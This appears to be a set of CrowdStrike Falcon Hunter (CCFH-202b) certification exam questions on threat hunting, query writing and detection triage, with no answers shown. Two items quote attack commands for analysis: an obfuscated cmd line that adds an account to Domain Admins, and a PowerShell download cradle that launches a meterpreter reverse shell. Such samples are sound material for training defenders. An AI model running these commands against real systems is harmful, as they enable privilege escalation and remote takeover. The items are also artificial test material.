CCFH-202b CrowdStrike Certified Falcon Hunter Questions and Answers
You are investigating a suspicious file execution on a host and need to understand how the process interacted with the system. Which combination of key data event types should be used in this scenario to understand the process execution and its network activity?
While performing a threat hunt in your environment, you decide to identify rare occurrences of user agent strings over the past 30 days. Which query will highlight those results using CQL?
You want to find all executions of a file on older Windows operating systems. You also want to include the Windows OU and focus on OUs with highly privileged systems and users. Which query will include the file name, operating system, and OU?
Which statement will filter for all events that correspond to a new scheduled task registered by the user "Doris"?
According to the MITRE ATT & CK Framework, if an adversary is trying to Gain Access by Credential Access via OS Credential Dumping, what is the specific attacker's technique that you can also use as a filter on the detections page to find similar activities?
You suspect that a user is abusing their admin privileges and you want to see the recent commands they have been utilizing. Which Investigate search will identify this?
What will the following obfuscated command do?
cmd /c "set x=^n^e^t & set y=@er & set yy=z & set z=r & set r=remove & set f=Domain+ff & set ff=Admin & set g=gumball@ & echo %x%%y:@=us% /%z:r=add% %ff% %g:@=r% | cmd"
Your organization uses an internally developed application for operations. The application is triggering Indicators of Attack (IOA) detections for vulnerable driver usage on servers where Falcon was just installed. After reviewing the application, you determine that application behavior is expected. What will reduce risk in the environment the most?
You want to use result data from an Advanced Event Search to create a custom dashboard that will display the total number of detections in a seven-day time period. Which widget will allow you to display the total number of detections as a single value digit?
You receive an alert for the following process tree:
w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe Which of the following describes what has occurred?
You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:
powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force
What is this command doing?
Which Falcon feature creates a graphical view of users, endpoints, and the connections between them by logon type?
What can a hunter add at the end of a search string in Advanced Event Search to identify outliers when quantifying the results?